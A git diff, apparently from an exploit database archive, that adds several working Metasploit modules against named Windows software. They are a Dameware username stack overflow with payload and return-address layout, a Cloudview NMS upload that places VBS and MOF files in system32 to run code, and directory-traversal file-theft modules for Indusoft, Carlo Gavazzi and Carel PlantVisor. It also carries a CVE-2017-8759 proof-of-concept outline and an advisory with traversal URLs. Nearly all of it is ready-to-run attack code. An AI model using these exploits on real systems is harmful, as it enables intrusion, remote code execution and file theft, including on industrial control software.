+		pkt[1092, 4] = [0x04eb9090].pack('V')	# jmp $+6
+		pkt[1096, 4] = [target.ret].pack('V')
+		pkt[1100, 50] = "\x90" * 50
+		pkt[1150, p.length] = p
+
+		client.put(pkt)
+		handler
+		service.close_client(client)
+	end
+
+end
diff --git a/platforms/windows/remote/42703.rb b/platforms/windows/remote/42703.rb
new file mode 100755
index 000000000..13898efb1
--- /dev/null
+++ b/platforms/windows/remote/42703.rb
@@ -0,0 +1,112 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	include Msf::Exploit::Remote::Tcp
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Dameware Mini Remote Control Username Stack Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a stack based buffer overflow vulnerability found
+				in Dameware Mini Remote Control v4.0. The overflow is caused when sending
+				an overly long username to the DWRCS executable listening on port 6129.
+				The username is read into a strcpy() function causing an overwrite of
+				the return pointer leading to arbitrary code execution.
+			},
+			'Author'         => [ 'James Fitts' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: $',
+			'References'     =>
+				[
+					[ 'CVE', '2005-2842' ],
+					[ 'BID', '14707' ],
+					[ 'URL', 'http://secunia.com/advisories/16655' ],
+					[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-08/1074.html' ]
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'thread',
+				},
+			'Privileged'     => true,
+			'Payload'        =>
+				{
+					'Space'	=> 140,
+					'BadChars' => "\x00\x0a\x0d",
+					'StackAdjustment' => -3500,
+					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
+					'Compat'        =>
+						{
+							'SymbolLookup' => '+ws2ord',
+						},
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 
+						'Windows XP SP3 EN', 
+							{ 
+								# msvcrt.dll
+								# push esp/ retn
+								'Ret' => 0x77c35459, 
+							} 
+					],
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Sept 01 2005'))
+
+		register_options(
+			[
+				Opt::RPORT(6129),
+			], self.class )
+	end
+
+	def pkt1
+		p = payload.encoded
+
+		boom = "\x43" * 259
+		boom[100, 4] = [target.ret].pack('V')
+		boom[108, p.length] = p
+
+		packet = "\x00" * 4056
+		packet[0, 4] = "\x30\x11\x00\x00"
+		packet[4, 4] = "\x00\x00\x00\x00"
+		packet[8, 4] = "\xd7\xa3\x70\x3d"
+		packet[12, 4] = "\x0a\xd7\x0d\x40"
+		packet[16, 20] = "\x00" * 20
+		packet[36, 4] = "\x01\x00\x00\x00"
+
+		packet[40, 4] = [0x00002710].pack('V')
+		packet[196, 259] = rand_text_alpha(259)
+		packet[456, 259] = boom
+		packet[716, 259] = rand_text_alpha(259)
+		packet[976, 259] = rand_text_alpha(259)
+		packet[1236, 259] = rand_text_alpha(259)
+		packet[1496, 259] = rand_text_alpha(259)
+
+		return packet
+	end
+
+	def pkt2
+		packet = "\x00" * 4096
+		packet[756, 259] = rand_text_alpha(259)
+
+		return packet
+		
+	end
+
+	def exploit
+		connect
+
+		sock.put(pkt1)
+		sock.recv(1024)
+		sock.put(pkt2)
+		sock.recv(84)
+
+		handler
+		disconnect
+	end
+
+end
+__END__
diff --git a/platforms/windows/remote/42704.rb b/platforms/windows/remote/42704.rb
new file mode 100755
index 000000000..e57355225
--- /dev/null
+++ b/platforms/windows/remote/42704.rb
@@ -0,0 +1,127 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::EXE
+	include Msf::Exploit::WbemExec
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Cloudview NMS File Upload',
+			'Description'    => %q{
+				This module exploits a file upload vulnerability
+				found within Cloudview NMS < 2.00b. The vulnerability
+				is triggered by sending specialized packets to the
+				server with directory traversal sequences (..@ in
+				this case) to browse outside of the web root.
+			},
+			'Author'         => [ 'james fitts' ],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'URL', '0day' ]
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'thread',
+				},
+			'Privileged'     => true,
+			'Payload'        =>
+				{
+					'BadChars' => "\x00",
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Cloudview NMS 2.00b on Windows', {} ],
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Oct 13 2014'))
+
+		register_options([
+			Opt::RPORT(80),
+			OptString.new('USERNAME', [ true, "The username to log in with", "Admin" ]),
+			OptString.new('PASSWORD', [ false, "The password to log in with", "" ])
+		], self.class )
+	end
+
+	def exploit
+
+		# setup
+		vbs_name	= rand_text_alpha(rand(10)+5) + '.vbs'
+		exe			= generate_payload_exe
+		vbs_content	= Msf::Util::EXE.to_exe_vbs(exe)
+		mof_name	= rand_text_alpha(rand(10)+5) + '.vbs'
+		mof			= generate_mof(mof_name, vbs_name)
+		peer		= "#{datastore['RHOST']}:#{datastore['RPORT']}"
+
+		print_status("Uploading #{vbs_name} to #{peer}...")
+
+		# logging in to get the "session"
+		@sess = rand(0..2048)
+		res = send_request_cgi({
+			'method'	=>	'POST',
+			'uri'		=>	"/MPR=#{@sess}:/",
+			'version'	=>	'1.1',
+			'ctype'		=>	'application/x-www-form-urlencoded',
+			'data'		=>	"username=#{datastore['USERNAME']}&password=#{datastore['PASSWORD']}&mybutton=Login%21&donotusejava=html"
+		})
+
+		# This is needed to setup the upload directory
+		res = send_request_cgi({
+			'method'	=> 'GET',
+			'uri'		=> "/MPR=#{@sess}:/descriptor!ChangeDir=C:@..@..@..@WINDOWS@system32@!-!-!@extdir%5Cfilelistpage!-!1000",
+			'version'	=> '1.1',
+		})
+
+		# Uploading VBS file
+		data = Rex::MIME::Message.new
+		data.add_part("#{vbs_content}", "application/octet-stream", nil, "form-data; name=\"upfile\"; filename=\"#{vbs_name}\"")
+		post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
+
+		res = send_request_cgi({
+			'method'	=>	'POST',
+			'uri'		=>	"/MPR=#{@sess}:/",
+			'version'	=>	'1.1',
+			'ctype'		=>	"multipart/form-data; boundary=#{data.bound}",
+			'data'		=>	post_data
+		})
+
+		if res.body =~ /Uploaded file OK/
+			print_good("Uploaded #{vbs_name} successfully!")
+			print_status("Uploading #{mof_name} to #{peer}...")
+
+			# Setting up upload directory
+			res = send_request_cgi({
+				'method'	=>	'GET',
+				'uri'		=>	"/MPR=#{@sess}:/descriptor!ChangeDir=C:@..@..@..@WINDOWS@system32@wbem@mof@!-!-!@extdir%5Cfilelistpage!-!1000",
+				'version'	=>	'1.1'
+			})
+
+			# Uploading MOF file
+			data = Rex::MIME::Message.new
+			data.add_part("#{mof}", "application/octet-stream", nil, "form-data; name=\"upfile\"; filename=\"#{mof_name}\"")
+			post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
+
+			res = send_request_cgi({
+				'method'	=>	'POST',
+				'uri'		=>	"/MPR=#{@sess}:/",
+				'version'	=>	'1.1',
+				'ctype'		=>	"multipart/form-data; boundary=#{data.bound}",
+				'data'		=>	post_data
+			})
+
+			if res.body =~ /Uploaded file OK/
+				print_good("Uploaded #{mof_name} successfully!")
+			else
+				print_error("Something went wrong...")
+			end
+		else
+			print_error("Something went wrong...")
+		end
+
+	end
+
+end
diff --git a/platforms/windows/remote/42711.txt b/platforms/windows/remote/42711.txt
new file mode 100755
index 000000000..91c63ef54
--- /dev/null
+++ b/platforms/windows/remote/42711.txt
@@ -0,0 +1,17 @@
+Source: https://github.com/Voulnet/CVE-2017-8759-Exploit-sample
+
+Running CVE-2017-8759 exploit sample.
+
+Flow of the exploit:
+
+Word macro runs in the Doc1.doc file. The macro downloads a badly formatted txt file over wsdl, which triggers the WSDL parser log. Then the parsing log results in running mshta.exe which in turn runs a powershell commands that runs mspaint.exe
+
+To test:
+
+Run a webserver on port 8080, and put the files exploit.txt and cmd.hta on its root. For example python -m SimpleHTTPServer 8080
+
+If all is good mspaint should run.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42711.zip
diff --git a/platforms/windows/webapps/42699.rb b/platforms/windows/webapps/42699.rb
new file mode 100755
index 000000000..dbbd6b285
--- /dev/null
+++ b/platforms/windows/webapps/42699.rb
@@ -0,0 +1,59 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+	Rank = GreatRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Indusoft Web Studio Directory Traversal',
+			'Description'    => %q{
+				This module exploits a flaw found in Indusoft Web Studio
+				<= 7.1 before SP2 Patch 4. This specific flaw allows users
+				to browse outside of the webroot to download files found
+				on the underlying system
+			},
+			'Author'         => [ 'James Fitts' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: $',
+			'References'     =>
+				[
+					[ 'CVE', '2014-0780' ],
+					[ 'ZDI', '14-118/' ],
+					[ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-107-02']
+				],
+			'DisclosureDate' => 'Jan 18 2013'))
+
+		register_options(
+			[
+				OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 8]),
+				OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
+				Opt::RPORT(80)
+			], self.class )
+	end
+
+	def run
+
+	depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
+	levels = "/" + ("../" * depth)
+
+	res = send_request_raw({
+		'method'	=> 'GET',
+		'uri'		=> "/" + levels + datastore['FILE'],
+	})
+
+	if res and res.code == 200 and res.message =~ /Sending file/
+		loot = res.body
+		if not loot or loot.empty?
+			print_status("File from #{rhost}:#{rport} is empty...")
+			return
+		end
+		file = ::File.basename(datastore['FILE'])
+		path = store_loot('indusoft.webstudio.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
+		print_status("Stored #{datastore['FILE']} to #{path}")
+		return
+	end
+
+	end
+end
diff --git a/platforms/windows/webapps/42705.rb b/platforms/windows/webapps/42705.rb
new file mode 100755
index 000000000..e000bb02b
--- /dev/null
+++ b/platforms/windows/webapps/42705.rb
@@ -0,0 +1,67 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+	Rank = GreatRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Carlo Gavazzi Powersoft Directory Traversal',
+			'Description'    => %q{
+				This module exploits a directory traversal vulnerability
+				found in Carlo Gavazzi Powersoft <= 2.1.1.1. The vulnerability
+				is triggered when sending a specially crafted GET request to the
+				server. The location parameter of the GET request is not sanitized
+				and the sendCommand.php script will automatically pull down any
+				file requested
+			},
+			'Author'         => [ 'james fitts' ],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'URL', 'http://gleg.net/agora_scada_upd.shtml']
+				],
+			'DisclosureDate' => 'Jan 21 2015'))
+
+		register_options(
+			[
+				OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 8]),
+				OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
+				OptString.new('USERNAME', [ true, 'Username to authenticate with', 'admin']),
+				OptString.new('PASSWORD', [ true, 'Password to authenticate with', 'admin']),
+				Opt::RPORT(80)
+			], self.class )
+	end
+
+	def run
+
+	require 'base64'
+
+	credentials = Base64.encode64("#{datastore['USERNAME']}:#{datastore['PASSWORD']}")
+
+	depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
+	levels = "/" + ("../" * depth)
+
+	res = send_request_raw({
+		'method'	=> 'GET',
+		'uri'		=> "#{levels}#{datastore['FILE']}?res=&valid=true",
+		'headers'	=>	{
+			'Authorization'	=>	"Basic #{credentials}"
+		},
+	})
+
+	if res and res.code == 200
+		loot = res.body
+		if not loot or loot.empty?
+			print_status("File from #{rhost}:#{rport} is empty...")
+			return
+		end
+		file = ::File.basename(datastore['FILE'])
+		path = store_loot('carlo.gavazzi.powersoft.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
+		print_status("Stored #{datastore['FILE']} to #{path}")
+		return
+	end
+
+	end
+end
diff --git a/platforms/windows/webapps/42706.rb b/platforms/windows/webapps/42706.rb
new file mode 100755
index 000000000..6d5dfb7f9
--- /dev/null
+++ b/platforms/windows/webapps/42706.rb
@@ -0,0 +1,57 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+	Rank = GreatRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Carel Pl@ntVisor Directory Traversal',
+			'Description'    => %q{
+				This module exploits a directory traversal vulnerability
+				found in Carel Pl@ntVisor <= 2.4.4. The vulnerability is
+				triggered by sending a specially crafted GET request to the
+				victim server.
+			},
+			'Author'         => [ 'james fitts' ],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'CVE', '2011-3487' ],
+					[ 'BID', '49601' ],
+				],
+			'DisclosureDate' => 'Jun 29 2012'))
+
+		register_options(
+			[
+				OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 10]),
+				OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
+				Opt::RPORT(80)
+			], self.class )
+	end
+
+	def run
+
+	depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
+	levels = "/" + ("..%5c" * depth)
+
+	res = send_request_raw({
+		'method'	=> 'GET',
+		'uri'		=> "#{levels}#{datastore['FILE']}",
+	})
+
+	if res and res.code == 200
+		loot = res.body
+		if not loot or loot.empty?
+			print_status("File from #{rhost}:#{rport} is empty...")
+			return
+		end
+		file = ::File.basename(datastore['FILE'])
+		path = store_loot('plantvisor.file', 'application/octet-stream', rhost, loot, file, datastore['FILE'])
+		print_status("Stored #{datastore['FILE']} to #{path}")
+		return
+	end
+
+	end
+end
diff --git a/platforms/windows/webapps/42707.txt b/platforms/windows/webapps/42707.txt
new file mode 100755
index 000000000..2114b7751
--- /dev/null
+++ b/platforms/windows/webapps/42707.txt
@@ -0,0 +1,76 @@
+#######################################################################
+
+                             Luigi Auriemma
+
+Application:  Carel PlantVisor
+              http://www.carel.com/carelcom/web/eng/catalogo/prodotto_dett.jsp?id_prodotto=310
+Versions:     <= 2.4.4
+Platforms:    Windows
+Bug:          directory traversal
+Exploitation: remote
+Date:         13 Sep 2011
+Author:       Luigi Auriemma
+              e-mail: aluigi@autistici.org
+              web:    aluigi.org
+
+
+#######################################################################
+
+
+1) Introduction
+2) Bug
+3) The Code
+4) Fix
+
+
+#######################################################################
+
+===============
+1) Introduction
+===============
+
+
+From vendor's homepage:
+"PlantVisor Enhanced is monitoring and telemaintenance software for
+refrigeration and air-conditioning systems controlled by CAREL
+instruments."
+
+
+#######################################################################
+
+======
+2) Bug
+======
+
+
+CarelDataServer.exe is a web server listening on port 80.
+
+The software is affected by a directory traversal vulnerability that
+allows to download the files located on the disk where it's installed.
+Both slash and backslash and their HTTP encoded values are supported.
+
+
+#######################################################################
+
+===========
+3) The Code
+===========
+
+
+http://SERVER/..\..\..\..\..\..\boot.ini
+http://SERVER/../../../../../../boot.ini
+http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cboot.ini
+http://SERVER/..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
+
+
+#######################################################################
+
+======
+4) Fix
+======
+
+
+No fix.
+
+
+#######################################################################
\ No newline at end of file